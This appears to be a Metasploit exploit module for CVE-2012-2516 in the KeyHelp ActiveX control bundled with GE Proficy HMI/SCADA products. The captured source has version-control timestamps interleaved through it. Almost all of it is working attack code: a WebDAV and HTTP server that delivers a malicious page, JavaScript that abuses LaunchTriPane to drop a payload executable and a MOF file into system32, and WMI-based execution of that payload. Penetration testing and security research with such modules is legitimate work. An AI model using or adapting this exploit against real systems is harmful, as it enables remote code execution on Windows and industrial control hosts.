2012-10-10 17:14:54 +00:00
##
2013-10-15 18:50:46 +00:00
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2012-10-10 17:14:54 +00:00
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
include Msf :: Exploit :: Remote :: HttpServer :: HTML
include Msf :: Exploit :: EXE
include Msf :: Exploit :: WbemExec
2013-11-12 18:37:29 +00:00
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::WINDOWS,
# :ua_name => HttpClients::IE,
# :javascript => true,
# :rank => NormalRanking,
# :classid => "{45E66957-2932-432A-A156-31503DF0A681}",
# :method => "LaunchTriPane",
#})
2013-08-30 21:28:54 +00:00
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability' ,
'Description' = > %q{
This module exploits a code execution vulnerability in the KeyScript ActiveX
control from keyhelp . ocx . It is packaged in several products or GE , such as
Proficy Historian 4 . 5 , 4 . 0 , 3 . 5 , and 3 . 1 , Proficy HMI / SCADA 5 . 1 and 5 . 0 , Proficy
Pulse 1 . 0 , Proficy Batch Execution 5 . 6 , and SI7 I / O Driver between 7 . 20 and 7 . 42 .
When the control is installed with these products , the function " LaunchTriPane "
will use ShellExecute to launch " hh.exe " , with user controlled data as parameters .
Because of this , the " -decompile " option can be abused to write arbitrary files on
the remote system .
Code execution can be achieved by first uploading the payload to the remote
machine , and then upload another mof file , which enables Windows Management
Instrumentation service to execute it . Please note that this module currently only
works for Windows before Vista .
On the other hand , the target host must have the WebClient service ( WebDAV
Mini - Redirector ) enabled . It is enabled and automatically started by default on
Windows XP SP3
} ,
'Author' = >
[
'rgod <rgod[at]autistici.org>' , # Vulnerability discovery
'juan vazquez' # Metasploit module
] ,
'License' = > MSF_LICENSE ,
'References' = >
[
[ 'CVE' , '2012-2516' ] ,
[ 'OSVDB' , '83311' ] ,
[ 'BID' , '55265' ] ,
2013-10-21 20:07:07 +00:00
[ 'ZDI' , '12-169' ] ,
2013-08-30 21:28:54 +00:00
[ 'URL' , 'http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863' ]
] ,
'DefaultOptions' = >
{
'EXITFUNC' = > 'process' ,
} ,
'Payload' = >
{
'Space' = > 2048 ,
'StackAdjustment' = > - 3500 ,
} ,
'Platform' = > 'win' ,
'Targets' = >
[
#Windows before Vista because of the WBEM technique
[ 'Automatic' , { } ] ,
] ,
'DisclosureDate' = > 'Jun 26 2012' ,
'DefaultTarget' = > 0 ) )
register_options (
[
OptPort . new ( 'SRVPORT' , [ true , " The daemon port to listen on " , 80 ] ) ,
OptString . new ( 'URIPATH' , [ true , " The URI to use. " , " / " ] )
] , self . class )
end
def on_new_session ( client )
print_status ( " The exe payload (C: \\ windows \\ system32 \\ msfmsf.exe) and mof file (C: \\ windows \\ system32 \\ wbem \\ mof \\ good \\ msfmsf.mof) must be removed manually. " )
end
def auto_target ( cli , request )
agent = request . headers [ 'User-Agent' ]
ret = nil
# Check for MSIE and/or WebDAV redirector requests
if agent =~ / (Windows NT 5 \ .1|MiniRedir \/ 5 \ .1) /
ret = targets [ 0 ]
elsif agent =~ / (Windows NT 5 \ .2|MiniRedir \/ 5 \ .2) /
ret = targets [ 0 ]
elsif agent =~ / MSIE /
ret = targets [ 0 ]
else
print_error ( " Unknown User-Agent: #{ agent } " )
end
ret
end
def on_request_uri ( cli , request )
mytarget = target
if target . name == 'Automatic'
mytarget = auto_target ( cli , request )
if ( not mytarget )
send_not_found ( cli )
return
end
end
# If there is no subdirectory in the request, we need to redirect.
if ( request . uri == '/' ) or not ( request . uri =~ / \/ [^ \/ ]+ \/ / )
if ( request . uri == '/' )
subdir = '/' + rand_text_alphanumeric ( 8 + rand ( 8 ) ) + '/'
else
subdir = request . uri + '/'
end
print_status ( " Request for \" #{ request . uri } \" does not contain a sub-directory, redirecting to #{ subdir } ... " )
send_redirect ( cli , subdir )
return
end
# dispatch WebDAV requests based on method first
case request . method
when 'OPTIONS'
process_options ( cli , request , mytarget )
when 'PROPFIND'
process_propfind ( cli , request , mytarget )
when 'GET'
process_get ( cli , request , mytarget )
when 'PUT'
print_status ( " Sending 404 for PUT #{ request . uri } ... " )
send_not_found ( cli )
else
print_error ( " Unexpected request method encountered: #{ request . method } " )
end
end
#
# GET requests
#
def process_get ( cli , request , target )
print_status ( " Responding to GET request #{ request . uri } " )
# dispatch based on extension
if ( request . uri =~ / \ .chm$ /i )
#
# CHM requests sent by IE and the WebDav Mini-Redirector
#
if request . uri =~ / #{ @var_exe_name } /
print_status ( " Sending CHM with payload " )
send_response ( cli , @chm_payload , { 'Content-Type' = > 'application/octet-stream' } )
elsif request . uri =~ / #{ @var_mof_name } /
print_status ( " Sending CHM with mof " )
send_response ( cli , @chm_mof , { 'Content-Type' = > 'application/octet-stream' } )
else
send_not_found ( cli )
end
else
#
# HTML requests sent by IE and Firefox
#
my_host = ( datastore [ 'SRVHOST' ] == '0.0.0.0' ) ? Rex :: Socket . source_address ( cli . peerhost ) : datastore [ 'SRVHOST' ]
path = request . uri . gsub ( / \/ / , '\\\\\\' )
payload_unc = '\\\\\\\\' + my_host + path + @var_exe_name + '.chm'
mof_unc = '\\\\\\\\' + my_host + path + @var_mof_name + '.chm'
print_status ( " Using #{ payload_unc } for payload... " )
print_status ( " Using #{ mof_unc } for the mof file... " )
html = <<-HTML
< html >
< body >
< script >
KeyScript = new ActiveXObject ( " KeyHelp.KeyScript " ) ;
ChmPayloadFile = " -decompile C: \\ \\ WINDOWS \\ \\ system32 \\ \\ #{ payload_unc } " ;
ChmMofFile = " -decompile c: \\ \\ WINDOWS \\ \\ system32 \\ \\ wbem \\ \\ mof \\ \\ #{ mof_unc } " ;
KeyScript . LaunchTriPane ( ChmPayloadFile ) ;
setTimeout ( 'KeyScript.LaunchTriPane(ChmMofFile);' , 3000 ) ;
< / script>
< / body>
< / html>
HTML
html . gsub! ( / \ t \ t \ t / , '' )
print_status ( " Sending HTML page " )
send_response ( cli , html )
end
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options ( cli , request , target )
print_status ( " Responding to WebDAV OPTIONS request " )
headers = {
#'DASL' => '<DAV:sql>',
#'DAV' => '1, 2',
'Allow' = > 'OPTIONS, GET, PROPFIND' ,
'Public' = > 'OPTIONS, GET, PROPFIND'
}
send_response ( cli , '' , headers )
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind ( cli , request , target )
path = request . uri
print_status ( " Received WebDAV PROPFIND request " )
body = ''
if ( path =~ / \ .chm /i )
print_status ( " Sending CHM multistatus for #{ path } ... " )
body = % Q | < ? xml version = " 1.0 " ?>
2012-10-10 17:14:54 +00:00
< a : multistatus xmlns : b = " urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/ " xmlns : c = " xml: " xmlns : a = " DAV: " >
< a : response >
< / a:response>
< / a:multistatus>
|
2013-08-30 21:28:54 +00:00
elsif ( path =~ / \ .manifest$ /i ) or ( path =~ / \ .config$ /i ) or ( path =~ / \ .exe /i )
print_status ( " Sending 404 for #{ path } ... " )
send_not_found ( cli )
return
elsif ( path =~ / \/ $ / ) or ( not path . sub ( '/' , '' ) . index ( '/' ) )
# Response for anything else (generally just /)
print_status ( " Sending directory multistatus for #{ path } ... " )
body = % Q | < ? xml version = " 1.0 " encoding = " utf-8 " ?>
2012-10-10 17:14:54 +00:00
< D : multistatus xmlns : D = " DAV: " >
< D : response xmlns : lp1 = " DAV: " xmlns : lp2 = " http://apache.org/dav/props/ " >
< D : href > #{path}</D:href>
< D : propstat >
< D : prop >
< lp1 : resourcetype > < D : collection / > < / lp1:resourcetype>
< lp1 : creationdate > 2010 - 02 - 26 T17 : 07 : 12 Z < / lp1:creationdate>
< lp1 : getlastmodified > Fri , 26 Feb 2010 17 : 07 : 12 GMT < / lp1:getlastmodified>
< lp1 : getetag > " 39e0001-1000-4808c3ec95000 " < / lp1:getetag>
< D : lockdiscovery / >
< D : getcontenttype > httpd / unix - directory < / D:getcontenttype>
< / D:prop>
< D : status > HTTP / 1 . 1 200 OK < / D:status>
< / D:propstat>
< / D:response>
< / D:multistatus>
|
2013-08-30 21:28:54 +00:00
else
print_status ( " Sending 404 for #{ path } ... " )
send_not_found ( cli )
return
end
# send the response
resp = create_response ( 207 , " Multi-Status " )
resp . body = body
resp [ 'Content-Type' ] = 'text/xml'
cli . send_response ( resp )
end
def generate_payload_chm ( data )
2013-09-26 19:34:48 +00:00
path = File . join ( Msf :: Config . data_directory , " exploits " , " CVE-2012-2516 " , " template_payload.chm " )
2013-08-30 21:28:54 +00:00
fd = File . open ( path , " rb " )
chm = fd . read ( fd . stat . size )
fd . close
chm << data
chm
end
def generate_mof_chm ( data )
2013-09-26 19:34:48 +00:00
path = File . join ( Msf :: Config . data_directory , " exploits " , " CVE-2012-2516 " , " template_mof.chm " )
2013-08-30 21:28:54 +00:00
fd = File . open ( path , " rb " )
chm = fd . read ( fd . stat . size )
fd . close
chm << data
chm
end
#
# When exploit is called, generate the chm contents
#
def exploit
if datastore [ 'SRVPORT' ] . to_i != 80 || datastore [ 'URIPATH' ] != '/'
fail_with ( Failure :: Unknown , 'Using WebDAV requires SRVPORT=80 and URIPATH=/' )
end
@var_mof_name = rand_text_alpha ( 7 )
@var_exe_name = rand_text_alpha ( 7 )
payload_contents = generate_payload_exe
mof_contents = generate_mof ( " msfmsf.mof " , " msfmsf.exe " )
@chm_payload = generate_payload_chm ( payload_contents )
@chm_mof = generate_mof_chm ( mof_contents )
super
end
2012-10-10 17:14:54 +00:00
end